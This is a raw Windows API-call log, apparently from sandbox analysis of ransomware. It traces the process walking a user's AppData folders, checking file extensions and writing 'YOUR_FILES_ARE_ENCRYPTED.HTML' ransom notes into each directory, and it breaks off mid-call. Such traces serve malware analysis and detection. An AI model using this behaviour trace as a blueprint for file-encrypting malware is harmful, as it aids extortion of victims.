0x0 [0123.111] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 68 [0123.111] PathFindExtensionW (pszPath="CREDHIST") returned="" [0123.111] lstrlenW (lpString="") returned 0 [0123.111] PathFindExtensionW (pszPath="CREDHIST") returned="" [0123.111] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x50866c1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x50866c1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5088b163, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="S-1-5-21-1560258661-3990802383-1811730007-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0123.111] StrStrIW (lpFirst="S-1-5-21-1560258661-3990802383-1811730007-1000", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.111] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000") returned 106 [0123.111] GetProcessHeap () returned 0x600000 [0123.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0123.113] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000" [0123.113] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\*" [0123.113] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x50866c1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5088b163, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5088b163, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4690, dwReserved1=0x6f4618, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0123.113] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x50866c1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5088b163, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5088b163, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4690, dwReserved1=0x6f4618, cFileName="..", cAlternateFileName="")) returned 1 [0123.113] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5088b163, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5088b163, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x91ec0737, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x6f4690, dwReserved1=0x6f4618, cFileName="cfeedb70-e610-451b-90c2-def194b5fe80", cAlternateFileName="CFEEDB~1")) returned 1 [0123.113] StrStrIW (lpFirst="cfeedb70-e610-451b-90c2-def194b5fe80", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.113] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\cfeedb70-e610-451b-90c2-def194b5fe80") returned 143 [0123.113] PathFindExtensionW (pszPath="cfeedb70-e610-451b-90c2-def194b5fe80") returned="" [0123.113] lstrlenW (lpString="") returned 0 [0123.113] PathFindExtensionW (pszPath="cfeedb70-e610-451b-90c2-def194b5fe80") returned="" [0123.113] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5088b163, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5088b163, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x508b12b7, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x6f4690, dwReserved1=0x6f4618, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0123.113] StrStrIW (lpFirst="Preferred", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.114] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\Preferred") returned 116 [0123.114] PathFindExtensionW (pszPath="Preferred") returned="" [0123.114] lstrlenW (lpString="") returned 0 [0123.114] PathFindExtensionW (pszPath="Preferred") returned="" [0123.114] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5088b163, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5088b163, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x508b12b7, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x6f4690, dwReserved1=0x6f4618, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 0 [0123.114] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0123.114] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 136 [0123.114] GetProcessHeap () returned 0x600000 [0123.114] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1560258661-3990802383-1811730007-1000\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0123.117] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0123.118] CloseHandle (hObject=0x320) returned 1 [0123.118] GetProcessHeap () returned 0x600000 [0123.118] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.118] GetProcessHeap () returned 0x600000 [0123.118] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0123.119] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x9206413c, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="SYNCHIST", cAlternateFileName="")) returned 1 [0123.119] StrStrIW (lpFirst="SYNCHIST", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.119] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 68 [0123.119] PathFindExtensionW (pszPath="SYNCHIST") returned="" [0123.119] lstrlenW (lpString="") returned 0 [0123.119] PathFindExtensionW (pszPath="SYNCHIST") returned="" [0123.119] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x9206413c, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="SYNCHIST", cAlternateFileName="")) returned 0 [0123.119] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0123.119] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0123.119] GetProcessHeap () returned 0x600000 [0123.119] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.119] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\protect\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0123.128] WriteFile (in: hFile=0x308, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0123.129] CloseHandle (hObject=0x308) returned 1 [0123.129] GetProcessHeap () returned 0x600000 [0123.130] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.130] GetProcessHeap () returned 0x600000 [0123.130] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0123.130] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563371fc, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5635d3c1, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x5635d3c1, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xff6176b4, cFileName="Spelling", cAlternateFileName="")) returned 1 [0123.130] StrStrIW (lpFirst="Spelling", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.130] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling") returned 60 [0123.130] GetProcessHeap () returned 0x600000 [0123.130] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0123.130] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling" [0123.130] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\*" [0123.130] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563371fc, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5635d3c1, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x5635d3c1, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0123.132] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563371fc, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5635d3c1, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x5635d3c1, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0123.132] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5635d3c1, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x567d5b26, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0123.132] StrStrIW (lpFirst="en-US", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.132] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US") returned 66 [0123.133] GetProcessHeap () returned 0x600000 [0123.133] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0123.133] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US" [0123.133] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\*" [0123.133] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5635d3c1, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x567d5b26, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4692, dwReserved1=0x6f4618, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0123.133] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5635d3c1, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x567d5b26, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4692, dwReserved1=0x6f4618, cFileName="..", cAlternateFileName="")) returned 1 [0123.133] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x567d5b26, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x567d5b26, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x6f4692, dwReserved1=0x6f4618, cFileName="default.acl", cAlternateFileName="")) returned 1 [0123.133] StrStrIW (lpFirst="default.acl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.133] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\default.acl") returned 78 [0123.133] PathFindExtensionW (pszPath="default.acl") returned=".acl" [0123.133] lstrlenW (lpString=".acl") returned 4 [0123.133] PathFindExtensionW (pszPath="default.acl") returned=".acl" [0123.133] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5648e4eb, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5648e4eb, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x5648e4eb, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x6f4692, dwReserved1=0x6f4618, cFileName="default.dic", cAlternateFileName="")) returned 1 [0123.134] StrStrIW (lpFirst="default.dic", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.134] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\default.dic") returned 78 [0123.134] PathFindExtensionW (pszPath="default.dic") returned=".dic" [0123.134] lstrlenW (lpString=".dic") returned 4 [0123.134] PathFindExtensionW (pszPath="default.dic") returned=".dic" [0123.134] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x566a47fe, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x566a47fe, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x566a47fe, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x6f4692, dwReserved1=0x6f4618, cFileName="default.exc", cAlternateFileName="")) returned 1 [0123.134] StrStrIW (lpFirst="default.exc", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.134] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\default.exc") returned 78 [0123.134] PathFindExtensionW (pszPath="default.exc") returned=".exc" [0123.134] lstrlenW (lpString=".exc") returned 4 [0123.134] PathFindExtensionW (pszPath="default.exc") returned=".exc" [0123.134] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x566a47fe, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x566a47fe, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x566a47fe, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x6f4692, dwReserved1=0x6f4618, cFileName="default.exc", cAlternateFileName="")) returned 0 [0123.134] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0123.134] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 96 [0123.134] GetProcessHeap () returned 0x600000 [0123.134] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.134] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\spelling\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0123.138] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0123.140] CloseHandle (hObject=0x324) returned 1 [0123.140] GetProcessHeap () returned 0x600000 [0123.140] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.140] GetProcessHeap () returned 0x600000 [0123.140] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0123.141] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5635d3c1, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x567d5b26, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0123.141] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0123.141] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0123.141] GetProcessHeap () returned 0x600000 [0123.142] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\spelling\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0123.143] WriteFile (in: hFile=0x308, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0123.144] CloseHandle (hObject=0x308) returned 1 [0123.144] GetProcessHeap () returned 0x600000 [0123.144] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.144] GetProcessHeap () returned 0x600000 [0123.144] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0123.144] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xff6176b4, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0123.145] StrStrIW (lpFirst="SystemCertificates", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.145] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned 70 [0123.145] GetProcessHeap () returned 0x600000 [0123.145] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0123.145] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0123.145] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") 